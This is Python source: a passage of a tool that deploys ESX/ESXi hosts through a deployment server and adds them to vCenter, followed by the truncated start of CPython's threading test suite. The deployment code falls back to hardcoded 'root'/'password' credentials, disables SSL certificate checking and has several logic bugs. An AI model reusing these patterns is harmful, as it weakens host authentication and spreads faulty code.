entry['personalization'] = None
entry['overall_job_status'] = 0
entry['add_to_vcenter'] = ADDTOVC_NOT_STARTED
entry['reconfigure'] = {'id':-1, 'message':RECONFIGURE_NOT_SPECIFIED}
self.managedNodes.append(entry)
def _parseNodeDetails(self, details):
log.debug("Detail: %s", details)
node = self._get_node(details['uuid'])
log.debug(node)
if not node:
return
node['details'] = {}
node['details']['processorArchitecture'] = details.processorArchitecture
node['details']['processorCount'] = details.processorCount
node['details']['processorDescription'] = details.processorDescription
node['details']['processorSpeed'] = details.processorSpeed
node['details']['networkInterfaces'] = []
interfaces = node['details']['networkInterfaces']
try:
for netif in details.networkInterfaces:
if_details = {}
if_details['id'] = netif.id
if_details['dhcp'] = netif.dhcp
if_details['dnsDomain'] = netif.dnsDomain
if_details['ipAddress'] = netif.ipAddress
if_details['ipMask'] = netif.ipMask
if_details['macAddress'] = netif.macAddress
if getattr(netif, 'dnsServers', None):
if_details['dnsServers'] = netif.dnsServers.dnsServers
else:
if_details['dnsServers'] = []
if getattr(netif, 'gateways', None):
if_details['gateways'] = netif.gateways.gateways
else:
if_details['gateways'] = []
interfaces.append(if_details)
except:
log.error('error parsing networkInterfaces', exc_info=1)
def getManagedNodes(self, refresh=False):
if self._client == None or self.sk == None:
return None
if not self.managedNodes or refresh:
try:
result = self._client.service.listManagedNodesPerDS(self.sk, self.host, self.ds_type)
if result.returnCode == 0:
nodeList = result.nodeList
self._parseNodeList(nodeList)
for node in self.managedNodes:
self.getManagedNodeDetails(node['uuid'])
elif result.returnCode in (1021, 1022):
self.login()
return self.getManagedNodes(refresh)
else:
if hasattr(result, 'errorCode'):
self._dc_error(result.errorCode)
#if result.errorCode == 1021:
# self.dc_status = DC_STATUS_DC_CREDENTIALS
except:
log.error('error getManagedNodes', exc_info=1)
pass
return self.managedNodes
def getManagedNodeDetails(self, uuid):
if self._client == None:
return None
try:
details = self._client.service.getManagedNodeDetails(self.sk, self.host, self.ds_type, uuid)
self._parseNodeDetails(details);
return details
except Exception as ex:
log.info('exception: ', exc_info=1)
return None
# This function calls submitFolder in a way that only sends networking information and no folder name.
def reconfigure(self, uuid, personalization, os_type):
node = self._get_node(uuid)
try:
personalizationData = self._getPersonalizationXML(uuid, personalization, os_type)
result = self._client.service.submitFolder(self.sk, self.host, self.ds_type, None, uuid, None, personalizationData)
if result.returnCode == 0:
log.debug('Submitted reconfigure...')
node['reconfigure'] = {'id':result.scheduleIds[0], 'message':JOB_STATUS_MESSAGES['-1']}
# Invalid token or session. Re-login and try the call again.
elif result.returnCode in (1021, 1022):
log.debug('Error submitting reconfigure...Re-logging...')
self.login()
return self.reconfigure(uuid, personalization, os_type)
else:
log.debug('Reconfigure failed...')
node['reconfigure'] = {'id':-1, 'message':'Reconfigure failed (%d)' % (result.returnCode)}
node['overall_job_status'] = 1
return result
except WebFault as wf:
log.info('exception in reconfigre: ', exc_info=1)
node['overall_job_status'] = 1
self._dc_error(wf)
return None
def submitFolder(self, folderName, uuid):
if self._client == None:
return None
try:
result = self._client.service.submitFolder(self.sk, self.host, self.ds_type, None, uuid, folderName, None)
if result.returnCode == 0 and hasattr(result, 'scheduleIds'):
node = self._get_node(uuid)
job = {}
job['schedule_id'] = result.scheduleIds[0]
job['folder_name'] = folderName
job['finished'] = False
node['jobs'].append(job)
# Invalid token or session. Re-login and try the call again.
elif result.returnCode in (1021, 1022):
self.login()
return self.submitFolder(folderName, uuid)
return result
except WebFault as wf:
self._dc_error(wf)
return None
# Gets an XML string for the PersonalizationData parameter of the submitFolder and submitFolders calls.
def _getPersonalizationXML(self, uuid, personalizationData, os_type):
px_fmt = """
<root>
<computer id="%s" name="%s">
%s
<hostname>%s</hostname>
<nics>%s</nics>
</computer>
</root>
"""
nic_fmt_static = """
<nic id="%s">
<dhcp>No</dhcp>
<ipaddress>%s</ipaddress>
<mask>%s</mask>
%s
%s
%s
</nic>
"""
nic_fmt_dhcp = """
<nic id="%s">
<dhcp>Yes</dhcp>
</nic>
"""
node = self._get_node(uuid)
if not node:
return ""
data = personalizationData
if not data:
return ""
nics = []
for nic in data['nics']:
nics.append(data['nics'][nic])
nics.sort(lambda a,b: int(a['id'])-int(b['id']))
if data['dnsdomain'] != '':
domain_str = '<dnsdomain>%s</dnsdomain>' % (data['dnsdomain'])
else:
domain_str = ''
nic_str = ""
for nic in nics:
if not nic:
continue
if nic['useDhcp']:
nic_str += nic_fmt_dhcp % (nic['id'])
else:
ip = nic['ipAddress']
netmask = nic['netmask']
if nic['gateway'] and nic['gateway'] != "":
gateway = '<gateway>'+nic['gateway']+'</gateway>'
else:
gateway = ""
if nic['dns']:
dns = '<dns>'+','.join(nic['dns'])+'</dns>'
else:
dns = ""
nic_str += nic_fmt_static % (nic['id'], ip, netmask, gateway, dns, domain_str)
agent_str = ''
if os_type == 'ESXi':
agent_str = "<agent>no</agent>"
px_str = px_fmt % (node['id'], node['name'], agent_str, data['hostname'], nic_str)
log.debug("Personalization for node %s: %s" % (uuid, px_str))
return px_str
def _parseScheduleStatus(self, status):
status_items = []
for item in status:
# Hack for bad RDP information
if item.status == -3:
item.status = -1
status_item = {}
status_item['id'] = getattr(item, 'id', '')
status_item['status'] = getattr(item, 'status', '')
status_item['error_text'] = getattr(item, 'errorText', '')
status_item['failure_mode'] = getattr(item, 'failureMode', '')
if str(item.status) in JOB_STATUS_MESSAGES:
status_item['status_message'] = JOB_STATUS_MESSAGES[str(getattr(item, 'status', ''))]
else:
status_item['status_message'] = "Unknown"
status_items.append(status_item)
return status_items
def getScheduleStatusX(self, schedule_ids):
if self._client == None:
return None
#ids = self._client.factory.create("ArrayOf_xsd_string")
#ids.value = schedule_ids
ids = [schedule_ids]
try:
result = self._client.service.getScheduleStatusX(self.sk, self.host, self.ds_type, ids)
if result and result.returnCode == 0:
return self._parseScheduleStatus(result.scheduleStatusSet)
elif result.returnCode in (1021, 1022):
self.login()
return self.getScheduleStatusX(schedule_ids)
return result
except WebFault as wf:
log.info('exception in getScheduleStatusX: ', exc_info=1)
self._dc_error(wf)
return None
def getNodeScheduleStatus(self, uuid):
status_list = []
node = self._get_node(uuid)
if not node:
return None
for job in node['jobs']:
if not 'schedule_id' in job or job['finished']:
continue
job_obj = {}
job_obj['folder_name'] = job['folder_name']
status = self.getScheduleStatusX(job['schedule_id'])
if status and type(status).__name__=='list':
job_obj['status'] = status[0]
status_list.append(job_obj)
# Update the job status
job['status'] = status[0]
else:
log.debug("Failed getNodeScheduleStatus: %d" % (status.returnCode))
if status.returnCode == 1701:
# Manually set the job's status to removed.
job['status']['status'] = -5
job['status']['status_message'] = JOB_STATUS_MESSAGES['-5']
job['finished'] = True
node['overall_job_status'] = 1
log.debug('Returning from getNodeScheduleStatus')
return status_list
def _getHostThumbprint(self, host, port=443, md='sha1'):
try:
ssl = SSL.Connection(SSL.Context())
ssl.postConnectionCheck = None
try:
ssl.socket.settimeout(None)
ssl.connect((host, port))
except Exception as ex:
log.exception('Unable to connect to host %s', host)
return ""
try:
fp = ssl.get_peer_cert().get_fingerprint(md)
except Exception as ex:
log.exception('Unable to get certificate and fingerprint %s', host)
ssl.close()
return ""
# Got certification without exception, now close the connection
ssl.close()
# Sometimes the leading zero is dropped which causes an Odd-length string exception.
# When this happens we'll pad the beginning of the string with a zero.
if len(fp) > 0 and len(fp) % 2 != 0:
fp = '0'+fp
# Return the fingerprint as colon separated hex digits
return ':'.join(['%02x'%ord(x) for x in fp.decode('hex')])
except Exception as ex:
log.exception("Exception processing thumbprint for host %s", host)
return ""
def _getClusterMob(self, name):
vc = self._getvCenter()
clusters = vc.retreive_cluster_list()
for cluster in clusters:
try:
for prop in cluster.propSet:
if prop.name == 'name' and prop.val == name:
return cluster.obj
except:
pass
return None
def _getDatacenterMob(self, name):
vc = self._getvCenter()
datacenters = vc.retrieve_datacenter_list()
for dc in datacenters:
try:
for prop in dc.propSet:
if prop.name == 'name' and prop.val == name:
dc_host_folder = vc.retrieve_dc_host_folder(dc.obj.value)
log.debug(dc_host_folder)
return dc_host_folder
except:
log.exception('Error iterating throught the propSet')
return None
def _getvCenter(self):
vc = [vc for vc in catalog.get_all() if isinstance(vc, vCenter)]
return vc and vc[0] or None
def _getHostConnectSpec(self, host, thumbprint, username=None, password=None, vc_username=None, vc_password=None):
vc = self._getvCenter()
spec = vc.client.factory.create("ns0:HostConnectSpec")
spec.userName = username
spec.password = password
spec.hostName = host
delattr(spec, 'vmFolder')
# vCenter credentials
spec.vimAccountName = vc_username
spec.vimAccountPassword = vc_password
spec.force = True
spec.sslThumbprint = thumbprint
return spec
def addHostToVCenter(self, host, uuid="", cluster="", esx_credentials=None):
isCluster = True
# TODO: Correct vCenter by UUID
#vc = [vc for vc in catalog.get_all() if isinstance(vc, VirtualCenter) and vc.uuid.lower()==uuid.lower()]
vc = self._getvCenter()
if not vc:
log.debug("vCenter instance not found. Returning None.")
return None
# First see if the user selected a cluster.
mob = self._getClusterMob(cluster)
if not mob:
log.debug("Cluster entry not found for %s. Checking for datacenter." % (cluster))
# If we didn't find a cluster, look for a datacenter entry.
mob = self._getDatacenterMob(cluster)
if not mob:
log.debug("Datacenter entry not found. Returning.")
return None
isCluster = False
thumbprint = self._getHostThumbprint(host)
if thumbprint == "":
log.debug("Failed to get SSL thumbprint from host %s" % (host))
return None
if esx_credentials == None:
# Default to root/password if the user didn't provide any credentials. These are the credentials
# for a new ESX installation (not sure if this works for ESXi).
esx_credentials = ("root", "password")
# TODO: get correct vCenter password
username = vc.decode(vc.username)
password = vc.decode(vc.password)
spec = self._getHostConnectSpec(host, thumbprint, esx_credentials[0], esx_credentials[1], username, password)
# log.debug( spec )
if not spec:
log.debug("Spec returned none. Returning.")
return None
mob = ManagedObjectRef(mob._type, mob.value)
if isCluster:
return vc.vim.AddHost_Task(mob, spec, True)
else:
return vc.vim.AddStandaloneHost_Task(mob, spec, None, True)
# Check to see if deployment is running by acquiring the semaphore.
def deployment_running(self):
if not self.deployment_sem.acquire(False):
return True
else:
self.deployment_sem.release()
return False
# Loops through all jobs for each node and removes them.
def clear_finished_jobs(self):
for node in self.managedNodes:
if node['jobs']:
for job in node['jobs']:
node['jobs'].remove(job)
node['add_to_vcenter'] = ADDTOVC_NOT_STARTED
node['overall_job_status'] = 0
node['reconfigure'] = {'id':-1, 'message':RECONFIGURE_NOT_SPECIFIED}
self.monitor_sem.acquire()
self.failures = 0
self.monitor_sem.release()
self.dc_status = None
# Task states: error, queued, running, success
def monitorAddHostTasks(self, tasks, uuid):
# TODO: Get the correct vCenter
vc = self._getvCenter()
if not vc:
return None
add_tasks = [task['result'].value for task in tasks]
while True:
vc_tasks = []
# Create a new collector each time around.
collector = vc.client.service.CreateCollectorForTasks(vc.sc.taskManager, None)
while True:
# Read tasks in 100 page blocks. The stupid vSphere API filtering doesn't work, so we have to just get everything.
next_tasks = vc.client.service.ReadNextTasks(collector, 100)
if not next_tasks:
break;
vc_tasks = vc_tasks + next_tasks
# Get only tasks we care about.
vc_tasks = [task for task in vc_tasks if task.key in add_tasks]
has_running = False
for task in vc_tasks:
log.debug( task )
node_uuid = [t for t in tasks if task.key == task.key]
if node_uuid:
node_uuid = node_uuid[0]['uuid']
node = self._get_node(node_uuid)
if task.state == 'running' or task.state == 'queued':
node['add_to_vcenter'] = 'In progress'
has_running = True
elif task.state == 'error':
node['add_to_vcenter'] = task.error.localizedMessage
elif task.state == 'success':
node['add_to_vcenter'] = 'Successful'
else:
node['add_to_vcenter'] = 'Unknown'
if not has_running:
break
else:
sleep(30)
def update_comm_loss(self):
self.monitor_sem.acquire()
self.failures += 1
self.monitor_sem.release()
log.debug("Comm loss value updated: %d" % (self.failures))
# This function combines the submitFolder and the reconfigure above. This is used so that we can run
# the two calls in serial to accomodate the ESXi behavior.
def deploy_esxi(self, uuid, folderName, deployment_obj, vcUuid):
node = self._get_node(uuid)
type = self._findJobType(folderName)
exceptionCount = 0
# For ESXi, the personalization must be sent before the deployment job is started.
if deployment_obj['personalization']:
log.debug("ESXi: Reconfiguring host %s" % (uuid))
result = self.reconfigure(uuid, deployment_obj['personalization'], type)
# Deploy the selected folder.
result = self.submitFolder(folderName, uuid)
if result and result.returnCode == 0:
# Monitor the deployment job to completion.
has_jobs = True
while has_jobs:
has_jobs = False
try:
status = self.getNodeScheduleStatus(uuid)
log.debug(status)
for status_obj in status:
status_code = status_obj['status']['status']
log.debug("Status code for node %s: %d" % (uuid, status_code))
if status_code > -1:
for job in node['jobs']:
if job['schedule_id'] == status_obj['status']['id']:
job['finished'] = True
node['overall_job_status'] = status_code
else:
has_jobs = True
except Exception as ex:
log.debug('Exception in ESXi monitoring loop: %s' % (str(ex)))
exceptionCount += 1
if exceptionCount == 5:
log.debug("Encountered too many exceptions in ESXi monitor loop. Canceling.")
self.update_comm_loss()
return
# keep the loop going to try again
has_jobs = True
if has_jobs:
log.debug("Sleeping 120 seconds.")
sleep(120)
else:
if result:
log.debug("Folder submit for %s failed. Code: %d" % (folderName, result.returnCode))
job = {}
job['schedule_id'] = -1
job['folder_name'] = folderName
job['finished'] = True
if str(result.returnCode) in DC_ERRORS:
message = DC_ERRORS[str(result.returnCode)]
else:
message = 'An unknown error occurred at the deployment server: %d' % (result.returnCode)
job['error'] = {'errno':result.returnCode, 'message':message}
node['jobs'].append(job)
else:
log.debug("Result is None for folder submit %s" % (folderName))
# Don't add to vCenter if the submitFolder process failed.
return
if node['overall_job_status'] != 0:
log.debug("Deployment failed. Exiting.")
return
# Now that the deployment job is finished, begin the add to vCenter process. For ESXi, we have to
# wait for a bit until the ESXi installation finishes. RDP tells us the process is done before it
# actually finishes. We'll try and get the thumbprint for a while until we can contact the server.
add_host_tasks = []
try:
if 'addToVCenter' in deployment_obj and deployment_obj['addToVCenter']['interface']:
interface = deployment_obj['addToVCenter']['interface']
if interface != '' and interface != 'DHCP':
log.debug("Adding to vCenter using: %s" % (interface))
if deployment_obj['addToVCenter']['username'] == "" and deployment_obj['addToVCenter']['password'] == "":
esx_credentials = None
else:
esx_credentials = (deployment_obj['addToVCenter']['username'], deployment_obj['addToVCenter']['password'])
log.debug("Credentials: %s, ************" % (deployment_obj['addToVCenter']['username']))
# Use the getThumbprint function to determine when the host is available. Try once every 5 minutes 6 times.
# (basically wait for 30 minutes for the ESXi installation to finish)
thumbprint = ''
count = 0
while thumbprint == '' and count < 6:
thumbprint = self._getHostThumbprint(interface)
if thumbprint == '':
node['add_to_vcenter'] = 'Waiting for ESXi host at %s to become available.' % interface
log.debug("Received empty thumbprint for host %s. Waiting for 5 minutes." % (uuid))
count = count + 1
sleep(60*5)
log.debug("Thumbprint for host %s after polling: %s" % (uuid, thumbprint))
if thumbprint != '':
log.debug("Before addHostToVCenter: %s, %s, %s" % (interface, vcUuid, deployment_obj['addToVCenter']['cluster_name']))
result = self.addHostToVCenter(interface, vcUuid, deployment_obj['addToVCenter']['cluster_name'], esx_credentials)
if result and result._type == 'Task':
add_host_tasks.append({'uuid':uuid, 'result':result})
else:
log.debug("Result: %s" % str(result))
node['add_to_vcenter'] = 'Error adding host %s to vCenter. The vCenter server did not start the task. The host must be added manually.' % (interface)
else:
log.debug("Thumbprint not found. Unable to add host to vCenter.")
node['add_to_vcenter'] = 'Unable to contact the host at %s. Add to vCenter aborted.' % (interface)
else:
log.debug("Invalid interface for node %s: %s" % (uuid, interface))
if interface == 'DHCP':
node['add_to_vcenter'] = 'An interface configured for DHCP was specified. This host must be added to vCenter manually.'
else:
node['add_to_vcenter'] = 'No valid interface found. Add to vCenter aborted.'
else:
node['add_to_vcenter'] = 'No interface specified to add to vCenter.'
except Exception as ex:
node['add_to_vcenter'] = 'An error occurred while attempting to add host %s to vCenter. See the log for details.' % (interface)
log.exception("Exception while attempting vCenter add: %s" % (str(ex)))
raise ex
# Monitor each of the add host tasks that were just started.
self.monitorAddHostTasks(add_host_tasks, vcUuid)
# Handles the ESX deployment process for a single node.
def deploy_esx(self, uuid, folderName, deployment_obj, vcUuid):
node = self._get_node(uuid)
type = self._findJobType(folderName)
exceptionCount = 0
result = self.submitFolder(folderName, uuid)
if result and result.returnCode == 0:
# Monitor the deployment job to completion.
has_jobs = True
while has_jobs:
has_jobs = False
# Check to make sure that our main loop hasn't found a connection problem.
if self.dc_status == DC_STATUS_CONNECTION_LOST:
log.debug("Connection lost - exiting ESX deployment thread.")
return
try:
status = self.getNodeScheduleStatus(uuid)
for status_obj in status:
status_code = status_obj['status']['status']
log.debug("Status code for node %s: %d" % (uuid, status_code))
if status_code > -1:
for job in node['jobs']:
if job['schedule_id'] == status_obj['status']['id']:
job['finished'] = True
node['overall_job_status'] = status_code
else:
has_jobs = True
except Exception as ex:
log.debug('Exception in ESX monitoring loop: %s' % (str(ex)))
exceptionCount += 1
if exceptionCount == 5:
log.debug("Encountered too many exceptions in ESX monitor loop. Canceling.")
return
# keep the loop going to try again
has_jobs = True
if has_jobs:
log.debug("Sleeping 120 seconds.")
sleep(120)
else:
if result:
log.debug("Folder submit for %s failed. Code: %d" % (folderName, result.returnCode))
job = {}
job['schedule_id'] = -1
job['folder_name'] = folderName
job['finished'] = True
if str(result.returnCode) in DC_ERRORS:
message = DC_ERRORS[str(result.returnCode)]
else:
message = 'An unknown error occurred at the deployment server: %d' % (result.returnCode)
job['error'] = {'errno':result.returnCode, 'message':message}
node['jobs'].append(job)
else:
log.debug("Result is None for folder submit %s" % (folderName))
# Don't add to vCenter if the submitFolder process failed.
return
if node['overall_job_status'] != 0:
log.debug("Deployment failed. Exiting.")
return
try:
# For ESX, the personalization must be sent after the image is deployed and the agent is available.
if deployment_obj['personalization']:
log.debug("ESX: Reconfiguring host %s" % (uuid))
result = self.reconfigure(uuid, deployment_obj['personalization'], type)
if result.returnCode == 0:
id = result.scheduleIds[0]
log.debug("Reconfigure successful for host %s (schedule ID: %s)" % (uuid, id))
reconfiguring = True
while reconfiguring:
log.debug("In reconfigure loop...")
status = self.getScheduleStatusX(id)
if status:
status = status[0]
if hasattr(status, 'returnCode'):
log.debug("Received non-zero return code from getScheduleStatus for ID %s: %d" % (id, status.returnCode))
reconfiguring = False
elif 'status' in status and status['status'] >= 0:
log.debug("Reconfigure finished for host %s" % (uuid))
reconfiguring = False
else:
log.debug("Waiting for reconfigure to finish (host %s)" % (uuid))
sleep(30)
except:
log.info('exception in deploy_esx, reconfigre section: ', exc_info=1)
# Begin adding the host to vCenter. This process is now the same for ESX as it is for ESXi.
# The 6.3.1 ESX agent introduced an additional reboot that is not tracked by RDP. Therefore,
# we have to wait for the host to appear on the network before we can add it.
add_host_tasks = []
try:
if 'addToVCenter' in deployment_obj and deployment_obj['addToVCenter']['interface']:
interface = deployment_obj['addToVCenter']['interface']
if interface != '' and interface != 'DHCP':
log.debug("Adding to vCenter using: %s" % (interface))
if deployment_obj['addToVCenter']['username'] == "" and deployment_obj['addToVCenter']['password'] == "":
esx_credentials = None
else:
esx_credentials = (deployment_obj['addToVCenter']['username'], deployment_obj['addToVCenter']['password'])
log.debug("Credentials: %s, ************" % (deployment_obj['addToVCenter']['username']))
# Use the getThumbprint function to determine when the host is available. Try once every 5 minutes 6 times.
# (basically wait for 30 minutes for the ESX installation to finish)
thumbprint = ''
count = 0
while thumbprint == '' and count < 12:
thumbprint = self._getHostThumbprint(interface)
if thumbprint == '':
node['add_to_vcenter'] = 'Waiting for ESX host at %s to become available.' % interface
log.debug("Received empty thumbprint for host %s. Waiting for 5 minutes." % (uuid))
count = count + 1
sleep(60*5)
log.debug("Thumbprint for host %s after polling: %s" % (uuid, thumbprint))
if thumbprint != '':
log.debug("Before addHostToVCenter: %s, %s, %s" % (interface, vcUuid, deployment_obj['addToVCenter']['cluster_name']))
result = self.addHostToVCenter(interface, vcUuid, deployment_obj['addToVCenter']['cluster_name'], esx_credentials)
if result and result._type == 'Task':
add_host_tasks.append({'uuid':uuid, 'result':result})
else:
log.debug("Result: %s" % str(result))
node['add_to_vcenter'] = 'Error adding host %s to vCenter. The vCenter server did not start the task. The host must be added manually.' % (interface)
else:
log.debug("Thumbprint not found. Unable to add host to vCenter.")
node['add_to_vcenter'] = 'Unable to contact the host at %s. Add to vCenter aborted.' % (interface)
else:
log.debug("Invalid interface for node %s: %s" % (uuid, interface))
if interface == 'DHCP':
node['add_to_vcenter'] = 'An interface configured for DHCP was specified. This host must be added to vCenter manually.'
else:
node['add_to_vcenter'] = 'No valid interface found. Add to vCenter aborted.'
else:
node['add_to_vcenter'] = 'No interface specified to add to vCenter.'
except Exception as ex:
node['add_to_vcenter'] = 'An error occurred while attempting to add host %s to vCenter. See the log for details.' % (interface)
log.exception("Exception while attempting vCenter add: %s" % (str(ex)))
# Monitor each of the add host tasks that were just started.
self.monitorAddHostTasks(add_host_tasks, vcUuid)
def _findJobType(self, job):
type = [x['type'] for x in self.jobFolders if x['name'] == job]
if type:
return type[0]
# Default to ESX since we only have two choices.
return "ESX"
def begin_run_deployment(self, deployment_collection):
# Don't even start the thread if the deployment process is already running.
if not self.deployment_sem.acquire(False):
return
t = Thread(target=self._run_deployment, name="run_deployment", args=(deployment_collection,))
t.daemon = True
t.start()
# The main deployment function. Once a deployment batch has been started, it must run to completion
# before another batch is started.
# The jobs parameter should be a list of server GUIDs and jobs to be applied to each server according to the following format:
# deployment_collection = [
# {
# serverUuid: <uuid>,
# jobs: [
# {name:'job folder name 1', type:'ESX'},
# {name:'job folder name 2', type:'ESXi'}
# ],
# addToVCenter: {
# interface: '172.17.99.100',
# cluster: 'my-cluster'
# },
# },
# ]
# This function should not be called directly! It should be started using the
# begin_run_deployment function.
def _run_deployment(self, deployment_object):
add_host_tasks = []
threads = []
deployment_collection = deployment_object['deploymentList']
vcUuid = deployment_object['vcUuid']
log.debug("Running deployment (vCenter: %s)" % (vcUuid))
# Helper function to monitor an array of running threads.
def wait_threads(threads):
while True:
alive_count = 0
for thread in threads:
if thread.is_alive():
alive_count += 1
if not alive_count:
break
sleep(1)
# First reset overall status so we start with a clean slate.
for obj in deployment_collection:
uuid = obj['serverUuid']
node = self._get_node(uuid)
node['overall_job_status'] = 0
if obj['personalization'] and 'nics' in obj['personalization']:
node['reconfigure'] = {'id':-1, 'message':ADDTOVC_NOT_STARTED}
threads = []
for obj in deployment_collection:
uuid = obj['serverUuid']
node = self._get_node(uuid)
job = obj['jobs'][0]
# If the job has been flagged as an 'ESXi' job, assume it's an ESXi image and treat it differently.
type = self._findJobType(job)
log.debug("Found job type %s for job %s" % (type, job))
# Set up the thread args.
args = (uuid, job, obj, vcUuid)
if type == 'ESXi':
log.debug("ESXi: Attempting to start job folder %s for server %s (reconfigure: %s)" % (job, uuid, str(obj['personalization'])))
t = Thread(target=self.deploy_esxi, args=args)
t.daemon = True
t.start()
threads.append(t)
else:
log.debug("ESX: Attempting to start job folder %s for server %s" % (job, uuid))
t = Thread(target=self.deploy_esx, args=args)
t.daemon = True
t.start()
threads.append(t)
# Wait for each of the individual deployment threads to complete.
fail_count = 0
if threads:
while True:
alive_count = 0
for thread in threads:
if thread.is_alive():
alive_count += 1
if not alive_count:
break
sleep(120)
# Check to see if our threads failed (due to comm loss)
if self.failures == len(threads):
self.dc_status = DC_STATUS_CONNECTION_LOST
else:
self.dc_status = DC_STATUS_DEPLOYMENT_FINISHED
# Reset the failure value since we're done.
self.monitor_sem.acquire()
self.failures = 0
self.monitor_sem.release()
self.deployment_sem.release()
log.debug("Deployment finished")
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import verbose, import_module, cpython_only
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
import textwrap
import gc
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=support.SHORT_TIMEOUT)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args, **kwargs):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
